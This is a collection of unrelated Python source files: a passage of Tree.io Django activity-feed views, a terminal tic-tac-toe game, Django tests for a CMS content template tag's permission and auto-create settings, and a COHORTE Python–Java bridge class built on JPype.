        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save(commit=False)
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('news_my_activity'))
    else:
        form = UpdateRecordForm(user=profile)
    if response_format == 'rss':
        return ObjectFeed(title=_('My Activity'),
                          link=request.path,
                          description=_('Updates on activity in your Tree.io'),
                          objects=updates)(request)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/my_activity', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def index_by_module(request, module_name, response_format='html'):
    """Activity for a single module in the user's perspective.

    Raises Http404 when *module_name* matches no module in the
    perspective.
    """
    profile = request.user.profile
    try:
        module = profile.get_perspective().get_modules().filter(
            name__icontains=module_name)[0]
    except IndexError:
        # Narrowed from a bare except: only "no matching module" should
        # turn into a 404.
        raise Http404('No such module in your Perspective')
    query = _get_filter_query(profile, filters=request.GET) & Q(
        about__object_type__icontains=module_name) & (~Q(author=profile) | Q(score__gt=0))
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            # Bug fix: reverse() takes URL arguments via `args=`, not
            # `filters=` -- the original raised TypeError on every
            # successful form submission.
            return HttpResponseRedirect(
                reverse('news_index_by_module', args=[module_name]))
    else:
        form = UpdateRecordForm(user=profile)
    if response_format == 'rss':
        return ObjectFeed(title=(_(module.title) + ' ' + _('Activity')),
                          link=request.path,
                          description=_('Updates on activity in your Tree.io'),
                          objects=updates)(request)
    context = _get_default_context(request)
    context.update({'form': form,
                    'active_module': module,
                    'updates': updates,
                    'profile': profile,
                    'module_name': module_name})
    return render_to_response('news/index_by_module', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
#
# Widgets
#
@handle_response_format
@treeio_login_required
def widget_news_index(request, response_format='html'):
    """Widget: All Activity for the dashboard."""
    profile = request.user.profile
    query = _get_filter_query(profile) & (
        ~Q(author=profile) | Q(record_type='share') | Q(score__gt=0))
    updates = UpdateRecord.objects.filter(query).distinct()
    # Skip the share form here when the social widget already shows one.
    if Widget.objects.filter(user=profile, widget_name='widget_news_social').exists():
        form = None
    elif request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(
            request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('core_dashboard_index'))
    else:
        form = UpdateRecordForm(user=profile)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/widgets/index', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def widget_news_social(request, response_format='html'):
    """Widget: Social Activity ('share' records) for the dashboard."""
    profile = request.user.profile
    query = _get_filter_query(profile) & Q(record_type='share')
    updates = UpdateRecord.objects.filter(query).distinct()
    if request.POST:
        record = UpdateRecord()
        record.record_type = 'share'
        form = UpdateRecordForm(request.POST, user=profile, instance=record)
        if form.is_valid():
            record = form.save()
            # Preserve line breaks when the body is rendered as HTML.
            record.body = record.body.replace('\n', ' <br />')
            record.save()
            record.set_user_from_request(request)
            return HttpResponseRedirect(reverse('core_dashboard_index'))
    else:
        form = UpdateRecordForm(user=profile)
    context = _get_default_context(request)
    context['form'] = form
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/widgets/social', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
@handle_response_format
@treeio_login_required
def widget_my_watchlist(request, response_format='html'):
    """Widget: news about every object the user is subscribed to."""
    profile = request.user.profile
    query = _get_filter_query(profile, do_recipients=False) & Q(
        about__in=profile.subscriptions.all()) & ~Q(author=profile)
    updates = UpdateRecord.objects.filter(query).distinct()
    context = _get_default_context(request)
    context['updates'] = updates
    context['profile'] = profile
    return render_to_response('news/widgets/my_watchlist', context,
                              context_instance=RequestContext(request),
                              response_format=response_format)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
import os, sys
import platform
#clears the terminal
def terminal_clear():
    """Clear the terminal using the platform's native clear command."""
    system_name = platform.system()
    if system_name == "Linux":
        os.system('clear')
    elif system_name == "Windows":
        os.system('cls')
    else:
        print("You're probably screwed")
""" A class that has methods to display the board,
whos turn, and the palyers name and score.
"""
class Display(object):
    """Render the board and player roster to the terminal and read moves."""

    def update(self, board_str, players_str):
        """Clear the screen, then print player info followed by the board."""
        terminal_clear()
        print(players_str)
        print('\n' + board_str)

    def get_move(self):
        """Prompt the user for a move; returns [row, col] as entered."""
        return [input('row:'), input('col:')]
""" A class
"""
class Players(object):
    """Track the player roster: each player's name, score, piece and turn."""

    def __init__(self, roster=None):
        """Create a roster; defaults to two players with PLAYER 1 to move.

        *roster* maps player number -> dict with 'name', 'score',
        'piece' and 'turn' keys. A fresh default dict is built on every
        call: the original used a mutable default argument, so all
        Players instances shared -- and mutated -- a single roster.
        """
        if roster is None:
            roster = {
                0: {'name': 'PLAYER 1', 'score': 0, 'piece': 'O', 'turn': True},
                1: {'name': 'PLAYER 2', 'score': 0, 'piece': 'X', 'turn': False},
            }
        self.roster = roster

    def get_stat(self, player_num, stat_name):
        """Return one stat (e.g. 'score') for player *player_num*."""
        return self.roster.get(player_num).get(stat_name)

    def increment_score(self, player_num):
        """Increase the given player's score by one."""
        self.roster[player_num]['score'] = self.roster[player_num]['score'] + 1

    def num_of_players(self):
        """Return how many players are in the roster."""
        return len(self.roster)

    def change_turn(self):
        """Pass the turn to the next player, wrapping to player 0."""
        for i in self.roster.keys():
            if self.roster[i]['turn']:
                self.roster[i]['turn'] = False
                if i == len(self.roster) - 1:
                    self.roster[0]['turn'] = True
                else:
                    self.roster[i + 1]['turn'] = True
                # Stop after one hand-over so the new holder's flag is
                # not toggled again by a later loop iteration.
                return

    def get_roster_str(self):
        """Return a printable roster; an arrow marks whose turn it is."""
        roster_str = ''
        for stats in self.roster.values():
            roster_str = roster_str + '%s(%s):%s%s\n' % tuple(
                [stats.get('name'), stats.get('piece'), stats.get('score'), stats.get('turn')])
        roster_str = roster_str.replace('True', ' <----').replace('False', '')
        return roster_str
""" A class
"""
class Board(object):
    """A 3x3 tic-tac-toe board whose cells hold ' ', 'O' or 'X'."""

    def __init__(self, board=None):
        """Create a board; defaults to an empty 3x3 grid.

        A fresh grid is built on every call: the original used a mutable
        default argument, so all Board instances shared one grid.
        """
        if board is None:
            board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]
        self.board = board

    def is_winner(self):
        """Return True when a row, column or diagonal holds three equal
        non-blank pieces, otherwise False."""
        for i in range(3):
            # Row i.
            r = self.board[i]
            if r[0] != ' ' and r[0] == r[1] and r[1] == r[2]:
                return True
            # Column i.
            c = [self.board[j][i] for j in range(3)]
            if c[0] != ' ' and c[0] == c[1] and c[1] == c[2]:
                return True
        # Diagonals.
        diag1 = [self.board[i][i] for i in range(3)]
        diag2 = [self.board[i][abs(i - 2)] for i in range(3)]
        # Bug fix: the original tested diag2[0] in the diag1 branch, so
        # main-diagonal wins were missed whenever diag2[0] was blank.
        # Also removed a leftover debug print of the column contents.
        if diag1[0] != ' ' and diag1[0] == diag1[1] and diag1[1] == diag1[2]:
            return True
        if diag2[0] != ' ' and diag2[0] == diag2[1] and diag2[1] == diag2[2]:
            return True
        return False

    def get_board_str(self):
        """Return a printable board: column labels on top, row numbers at
        the right of each row."""
        board_str = ' 1 2 3 \n'
        for row_num, row in enumerate(self.board, start=1):
            board_str += '[%s-%s-%s]%s\n' % tuple(row + [row_num])
        return board_str

    def place_empty(self, place):
        """True when the [row, col] cell given by *place* is empty."""
        return self.board[place[0]][place[1]] == ' '

    def place(self, piece, place):
        """Put *piece* at the [row, col] cell in *place* if it is empty."""
        if self.board[place[0]][place[1]] == ' ':
            self.board[place[0]][place[1]] = piece
""" A class
"""
class Game(object):
    """Run a tic-tac-toe match: board state, player roster and display."""

    def __init__(self):
        """Set up a fresh board, roster and display."""
        self.board = Board()
        self.players = Players()
        self.display = Display()

    def start(self):
        """Main game loop: play until a win or a full board (9 turns)."""
        finished = False
        total_turns = 0
        self.dis_update()
        while not finished:
            move_place = self.get_valid_input()
            turn = self.get_turn()
            self.board.place(self.players.get_stat(turn, 'piece'), move_place)
            total_turns += 1
            self.players.change_turn()
            # A win is only possible from the fifth move onwards.
            if total_turns > 4:
                print('Total turns:%s' % total_turns)
                if self.board.is_winner():
                    finished = True
                    print('Winner')
                if total_turns >= 9:
                    finished = True
                    print('No winner')
            self.dis_update()
        print('END OF START METHOD')

    def get_valid_input(self):
        """Wrapper around Display.get_move(): loop until the user enters a
        1-based coordinate pair in 1..3 targeting an empty cell; returns
        the 0-based [row, col]."""
        move_coords = []
        valid_input = False
        while not valid_input:
            move_coords = self.display.get_move()
            try:
                if int(move_coords[0]) in range(1, 4) and int(move_coords[1]) in range(1, 4):
                    # Convert 1-based user input to 0-based indices.
                    move_coords[0] = int(move_coords[0]) - 1
                    move_coords[1] = int(move_coords[1]) - 1
                    if self.board.place_empty(move_coords):
                        valid_input = True
                    else:
                        raise ValueError
                else:
                    raise ValueError
            except ValueError:
                # Bad or occupied cell: redraw and prompt again.
                terminal_clear()
                self.dis_update()
        return move_coords

    def get_turn(self):
        """Return the number of the player whose turn it is."""
        for i in range(self.players.num_of_players()):
            if self.players.get_stat(i, 'turn'):
                return i

    def new_game(self):
        """Start a new game and update the players' scores (not implemented)."""
        pass

    def dis_update(self):
        """Refresh the terminal with the current board and roster."""
        self.display.update(self.board.get_board_str(), self.players.get_roster_str())
""" The Main method
"""
def main():
    """Entry point: build a Game, run it, then terminate via quit()."""
    print("start")
    game = Game()
    game.start()
    print("quit")
    quit()
    # Unreachable: quit() raises SystemExit before this return executes.
    return 0
#call the "main" function if running this script
if __name__ == '__main__': main()
| |
from django.test import TestCase
from django.template import Template, Context
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User, Permission
from django.contrib.contenttypes.models import ContentType
from content_edit.models import CmsContent
class SimpleTest(TestCase):
    """End-to-end tests for viewing and saving editable CMS content."""

    def setUp(self):
        # The editable-content views require a logged-in staff user.
        user = User.objects.create_user('temporary', 'temporary@gmail.com', 'temporary')
        user.is_staff = True
        user.save()
        self.client.login(username='temporary', password='temporary')

    def test_edit_content(self):
        """ Test viewing a new content area and changing it.
        """
        # Rendering the page auto-creates the missing CmsContent row.
        self.assertEqual(CmsContent.objects.count(), 0)
        response = self.client.get(reverse('sample_content_edit'))
        self.assertEqual(CmsContent.objects.count(), 1)

    def test_save_content(self):
        """ Test saving content """
        test_content = '<p>Hello</p>'
        # First GET creates the content row; the POST then updates it.
        response = self.client.get(reverse('sample_content_edit'))
        response = self.client.post(
            reverse('ajax_save_content'), {
                'content_name': 'fun_content',
                'content': test_content,
            },)
        cms_content = CmsContent.objects.get(site=1, name="fun_content")
        self.assertEqual(cms_content.content, test_content)
        # The saved content must show up when the page is rendered again.
        response = self.client.get(reverse('sample_content_edit'))
        self.assertContains(response, test_content)
class TemplateTagDefaultSettingsTests(TestCase):
    """Exercise the `cms_content` template tag under default settings
    (auto-creation and permission checks enabled) for every combination
    of existing/missing content and anonymous/permissioned/staff users.
    """

    def setUp(self):
        # One pre-existing content row named 'name1'.
        self.content1 = CmsContent(name='name1', content='content1',site_id=1)
        self.content1.save()
        # Staff ("admin") user.
        self.admin_user = User.objects.create_user('admin', 'admin@gmail.com', 'temporary')
        self.admin_user.is_staff = True
        self.admin_user.save()
        # Plain user without any CmsContent permissions.
        self.user_wo_perm = User.objects.create_user('user_wo_perm', 'admin@gmail.com', 'temporary')
        self.user_wo_perm.save()
        content_type = ContentType.objects.get_for_model(CmsContent)
        # User holding only the custom "add" permission.
        self.user_w_add_perm = User.objects.create_user('user_w_add_perm', 'admin@gmail.com', 'temporary')
        self.user_w_add_perm.save()
        add_perm = Permission.objects.create(codename='content_edit_add_cmscontent',
                                             name='add',
                                             content_type=content_type)
        self.user_w_add_perm.user_permissions.add(add_perm)
        # User holding only the custom "change" permission.
        self.user_w_change_perm = User.objects.create_user('user_w_change_perm', 'admin@gmail.com', 'temporary')
        self.user_w_change_perm.save()
        change_perm = Permission.objects.create(codename='content_edit_change_cmscontent',
                                                name='change',
                                                content_type=content_type)
        self.user_w_change_perm.user_permissions.add(change_perm)

    def test_existing_content_without_user(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context())
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_without_perms(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_wo_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_with_add_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_w_add_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_with_change_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_w_change_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_admin_user(self):
        # Staff users get the inline-editable wrapper div.
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.admin_user}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'<div id="content_name1" onblur="save_cms_content(this, \'name1\')" contenteditable="true">content1</div>')

    def test_non_existing_content_without_user(self):
        # AUTOCREATE: rendering an unknown name creates the row (count 2).
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context())
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_without_perms(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_wo_perm}))
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_with_add_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_w_add_perm}))
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_with_change_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_w_change_perm}))
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_admin_user(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.admin_user}))
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'<div id="content_name2" onblur="save_cms_content(this, \'name2\')" contenteditable="true"></div>')
        CmsContent.objects.exclude(name='name1').delete()
class TemplateTagNoAUTOCREATETests(TestCase):
    """Same matrix of `cms_content` tag tests, but with the tag module's
    AUTOCREATE flag switched off: rendering an unknown content name must
    NOT create a CmsContent row for non-staff users.
    """

    def setUp(self):
        # Disable auto-creation on the tag module for this test class;
        # tearDown restores it.
        from content_edit.templatetags import content_edit_tags
        setattr(content_edit_tags,'AUTOCREATE',False)
        # One pre-existing content row named 'name1'.
        self.content1 = CmsContent(name='name1', content='content1',site_id=1)
        self.content1.save()
        # Staff ("admin") user.
        self.admin_user = User.objects.create_user('admin', 'admin@gmail.com', 'temporary')
        self.admin_user.is_staff = True
        self.admin_user.save()
        # Plain user without any CmsContent permissions.
        self.user_wo_perm = User.objects.create_user('user_wo_perm', 'admin@gmail.com', 'temporary')
        self.user_wo_perm.save()
        content_type = ContentType.objects.get_for_model(CmsContent)
        # User holding only the custom "add" permission.
        self.user_w_add_perm = User.objects.create_user('user_w_add_perm', 'admin@gmail.com', 'temporary')
        self.user_w_add_perm.save()
        add_perm = Permission.objects.create(codename='content_edit_add_cmscontent',
                                             name='add',
                                             content_type=content_type)
        self.user_w_add_perm.user_permissions.add(add_perm)
        # User holding only the custom "change" permission.
        self.user_w_change_perm = User.objects.create_user('user_w_change_perm', 'admin@gmail.com', 'temporary')
        self.user_w_change_perm.save()
        change_perm = Permission.objects.create(codename='content_edit_change_cmscontent',
                                                name='change',
                                                content_type=content_type)
        self.user_w_change_perm.user_permissions.add(change_perm)

    def test_existing_content_without_user(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context())
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_without_perms(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_wo_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_with_add_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_w_add_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_user_with_change_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.user_w_change_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'content1')

    def test_existing_content_for_admin_user(self):
        # Staff users get the inline-editable wrapper div.
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name1' %}"
        ).render(Context({'user':self.admin_user}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'<div id="content_name1" onblur="save_cms_content(this, \'name1\')" contenteditable="true">content1</div>')

    def test_non_existing_content_without_user(self):
        # With AUTOCREATE off, no row is created: count stays at 1.
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context())
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_without_perms(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_wo_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_with_add_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_w_add_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_user_with_change_perm(self):
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.user_w_change_perm}))
        self.assertEqual(1, CmsContent.objects.count())
        self.assertEqual(out,'')
        CmsContent.objects.exclude(name='name1').delete()

    def test_non_existing_content_for_admin_user(self):
        # For staff users the row is still created (count becomes 2),
        # even with AUTOCREATE off.
        out = Template(
            "{% load content_edit_tags %}"
            "{% cms_content 'name2' %}"
        ).render(Context({'user':self.admin_user}))
        self.assertEqual(2, CmsContent.objects.count())
        self.assertEqual(out,'<div id="content_name2" onblur="save_cms_content(this, \'name2\')" contenteditable="true"></div>')
        CmsContent.objects.exclude(name='name1').delete()

    def tearDown(self):
        # Restore the module-level flag so other test classes are unaffected.
        from content_edit.templatetags import content_edit_tags
        setattr(content_edit_tags,'AUTOCREATE',True)
class TemplateTagCHECK_PERMSTests(TestCase):
    """Behaviour of the ``cms_content`` tag when CHECK_PERMS is disabled.

    With permission checking off, fine-grained permissions have no effect on
    rendering, missing content is auto-created on every render, and only
    staff users receive the editable markup.
    """

    def _render(self, name, user=None):
        """Render the cms_content tag for *name*, optionally as *user*."""
        source = ("{% load content_edit_tags %}"
                  "{% cms_content '" + name + "' %}")
        ctx = Context() if user is None else Context({'user': user})
        return Template(source).render(ctx)

    @staticmethod
    def _editable_div(name, body=''):
        """Expected editable markup for a content block."""
        return ('<div id="content_%s" onblur="save_cms_content(this, '
                '\'%s\')" contenteditable="true">%s</div>'
                % (name, name, body))

    @staticmethod
    def _drop_extra_content():
        """Remove any content auto-created during a test."""
        CmsContent.objects.exclude(name='name1').delete()

    def _create_user_with_perm(self, username, codename, perm_name,
                               content_type):
        """Create a user holding a single freshly-created permission."""
        user = User.objects.create_user(username, 'admin@gmail.com',
                                        'temporary')
        user.save()
        perm = Permission.objects.create(codename=codename, name=perm_name,
                                         content_type=content_type)
        user.user_permissions.add(perm)
        return user

    def setUp(self):
        from content_edit.templatetags import content_edit_tags
        content_edit_tags.CHECK_PERMS = False
        self.content1 = CmsContent(name='name1', content='content1',
                                   site_id=1)
        self.content1.save()
        self.admin_user = User.objects.create_user(
            'admin', 'admin@gmail.com', 'temporary')
        self.admin_user.is_staff = True
        self.admin_user.save()
        self.user_wo_perm = User.objects.create_user(
            'user_wo_perm', 'admin@gmail.com', 'temporary')
        self.user_wo_perm.save()
        content_type = ContentType.objects.get_for_model(CmsContent)
        self.user_w_add_perm = self._create_user_with_perm(
            'user_w_add_perm', 'content_edit_add_cmscontent', 'add',
            content_type)
        self.user_w_change_perm = self._create_user_with_perm(
            'user_w_change_perm', 'content_edit_change_cmscontent', 'change',
            content_type)

    def test_existing_content_without_user(self):
        out = self._render('name1')
        self.assertEqual(CmsContent.objects.count(), 1)
        self.assertEqual(out, 'content1')

    def test_existing_content_for_user_without_perms(self):
        out = self._render('name1', self.user_wo_perm)
        self.assertEqual(CmsContent.objects.count(), 1)
        self.assertEqual(out, 'content1')

    def test_existing_content_for_user_with_add_perm(self):
        out = self._render('name1', self.user_w_add_perm)
        self.assertEqual(CmsContent.objects.count(), 1)
        self.assertEqual(out, 'content1')

    def test_existing_content_for_user_with_change_perm(self):
        out = self._render('name1', self.user_w_change_perm)
        self.assertEqual(CmsContent.objects.count(), 1)
        self.assertEqual(out, 'content1')

    def test_existing_content_for_admin_user(self):
        out = self._render('name1', self.admin_user)
        self.assertEqual(CmsContent.objects.count(), 1)
        self.assertEqual(out, self._editable_div('name1', 'content1'))

    def test_non_existing_content_without_user(self):
        out = self._render('name2')
        self.assertEqual(CmsContent.objects.count(), 2)
        self.assertEqual(out, '')
        self._drop_extra_content()

    def test_non_existing_content_for_user_without_perms(self):
        out = self._render('name2', self.user_wo_perm)
        self.assertEqual(CmsContent.objects.count(), 2)
        self.assertEqual(out, '')
        self._drop_extra_content()

    def test_non_existing_content_for_user_with_add_perm(self):
        out = self._render('name2', self.user_w_add_perm)
        self.assertEqual(CmsContent.objects.count(), 2)
        self.assertEqual(out, '')
        self._drop_extra_content()

    def test_non_existing_content_for_user_with_change_perm(self):
        out = self._render('name2', self.user_w_change_perm)
        self.assertEqual(CmsContent.objects.count(), 2)
        self.assertEqual(out, '')
        self._drop_extra_content()

    def test_non_existing_content_for_admin_user(self):
        out = self._render('name2', self.admin_user)
        self.assertEqual(CmsContent.objects.count(), 2)
        self.assertEqual(out, self._editable_div('name2'))
        self._drop_extra_content()

    def tearDown(self):
        """Restore the CHECK_PERMS flag that setUp switched off."""
        from content_edit.templatetags import content_edit_tags
        content_edit_tags.CHECK_PERMS = True
| |
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
COHORTE Java isolate loader, based on jPype
**TODO:**
* Review constants names & values
:author: Thomas Calmant
:license: Apache Software License 2.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Modifications:
MOD_BD_20150916 Inherits PROP_NODE_DATA_DIR from pelix.
"""
# Python standard library
import logging
import os
import sys
import time
import threading
# iPOPO Decorators
from pelix.ipopo.decorators import ComponentFactory, Provides, Validate, \
Invalidate, Property, Requires
import pelix.framework
import pelix.shell
# COHORTE constants
import cohorte
import cohorte.repositories
# Herald
import herald
# JPype (Java bridge)
import jpype
# ------------------------------------------------------------------------------
# Documentation strings format
__docformat__ = "restructuredtext en"
# Version
__version_info__ = (1, 1, 0)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
ISOLATE_LOADER_FACTORY = 'cohorte-loader-java-factory'
""" Forker loader factory name """
LOADER_KIND = 'osgi'
""" Kind of isolate started with this loader """
BUNDLE_SERVICES_FOLDER = 'META-INF/services'
""" Path of the descriptions of the bundle services (in a JAR) """
FRAMEWORK_SERVICE = 'org.osgi.framework.launch.FrameworkFactory'
""" FrameworkFactory service descriptor in the framework JAR file """
FRAMEWORK_SYSTEMPACKAGES_EXTRA = "org.osgi.framework.system.packages.extra"
""" OSGi extra system packages """
PYTHON_BRIDGE_BUNDLE_API = "org.cohorte.pyboot.api"
""" Name of the Python bridge API bundle """
PYTHON_BRIDGE_BUNDLE = "org.cohorte.pyboot"
""" Name of the Python bridge bundle """
PYTHON_JAVA_BRIDGE_INTERFACE = "org.cohorte.pyboot.api.IPyBridge"
""" Interface of the Python - Java bridge """
HERALD_EVENT_BUNDLE_API = "org.cohorte.herald.eventapi"
""" Name of the bundle and package which contain the Herald Event API """
HERALD_EVENT_INTERFACE = "org.cohorte.herald.eventapi.IEvent"
""" Interface of an Herald Event """
HERALD_EVENT_FACTORY_INTERFACE = "org.cohorte.herald.eventapi.IEventFactory"
""" Interface of the Herald EventFactory service """
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
class PyBridge(object):
    """
    Python - Java bridge service implementation.

    Exposes the Python boot configuration and component beans to the Java
    world (IPyBridge interface) and reports instantiation results back to
    the Python side through a callback.
    """
    # pylint: disable=invalid-name
    # Implemented Java interface
    JAVA_INTERFACE = PYTHON_JAVA_BRIDGE_INTERFACE

    def __init__(self, context, jvm, java_configuration, configuration_parser,
                 callback):
        """
        Sets up the bridge

        :param context: The bundle context
        :param jvm: The JVM wrapper
        :param java_configuration: Java boot configuration
        :param configuration_parser: Configuration reader service
        :param callback: Method to call back on error or success
        """
        # Bundle context
        self._context = context
        # Java classes, used to convert Python values for the Java side
        self.ArrayList = jvm.load_class("java.util.ArrayList")
        self.Component = jvm.load_class("org.cohorte.pyboot.api.ComponentBean")
        self.HashMap = jvm.load_class("java.util.HashMap")
        # Prepare members
        self._callback = callback
        self._components = {}
        self._parser = configuration_parser
        # Convert stored components
        self._java_boot_config = self._to_java(java_configuration)
        self._prepare_components(java_configuration.composition)

    def _prepare_components(self, raw_components):
        """
        Converts the Python Component objects into Java Component beans

        :param raw_components: Python components representations
        """
        for component in raw_components:
            # Convert properties into a Java HashMap
            properties = self.HashMap()
            for key, value in component.properties.items():
                properties.put(key, value)
            # Store the component bean, indexed by component name
            self._components[component.name] = \
                self.Component(component.factory, component.name, properties)

    def _to_java(self, data):
        """
        Recursively converts lists and maps to Java ones

        :param data: Data to be converted
        :return: Converted data (Java collections for dict/list/tuple/set,
                 the value unchanged otherwise)
        """
        try:
            # Named tuple (in theory): convert it to a dictionary first
            as_dict = getattr(data, '_asdict')
        except AttributeError:
            # Keep data as is
            pass
        else:
            data = as_dict()

        if isinstance(data, dict):
            # Convert a dictionary
            converted = self.HashMap()
            for key, value in data.items():
                # Convert entry
                converted.put(self._to_java(key), self._to_java(value))
            return converted
        elif isinstance(data, (list, tuple, set)):
            # Convert a list
            converted = self.ArrayList()
            for item in data:
                # Convert each item
                converted.add(self._to_java(item))
            return converted
        else:
            # No conversion
            return data

    @staticmethod
    def debug(message, values):
        """
        Logs a debug message (Java API)
        """
        _logger.debug(message.format(*values))

    @staticmethod
    def error(message, values):
        """
        Logs an error message (Java API)
        """
        _logger.error(message.format(*values))

    def getComponents(self):
        """
        Retrieves the components to instantiate (Java API)

        :return: An array of components
        """
        # Create a list
        result = self.ArrayList()
        for component in self._components.values():
            result.add(component)
        return result

    def getStartConfiguration(self):
        """
        Retrieves the configuration used to start this isolate as a map

        :return: The configuration used to start this isolate
        """
        return self._java_boot_config

    @staticmethod
    def getPid():
        """
        Retrieves the Process ID of this isolate

        :return: The isolate PID
        """
        return os.getpid()

    def getRemoteShellPort(self):
        """
        Returns the port used by the Pelix remote shell, or -1 if the shell is
        not active

        :return: The port used by the remote shell, or -1
        """
        ref = self._context.get_service_reference(
            pelix.shell.REMOTE_SHELL_SPEC)
        if ref is None:
            return -1

        try:
            # Get the service
            shell = self._context.get_service(ref)
            # Get the shell port
            port = shell.get_access()[1]
            # Release the service
            self._context.unget_service(ref)
            return port
        except pelix.framework.BundleException:
            # Service lost (called while the framework was stopping)
            return -1

    def onComponentStarted(self, name):
        """
        Called when a component has been started

        :param name: Name of the started component
        """
        if name in self._components:
            del self._components[name]

        # Signal success once the last pending component is running
        if not self._components:
            self._callback(True, "All components have been instantiated")

    def onError(self, error):
        """
        Called when an error has occurred

        :param error: An error message
        """
        self._callback(False, error)

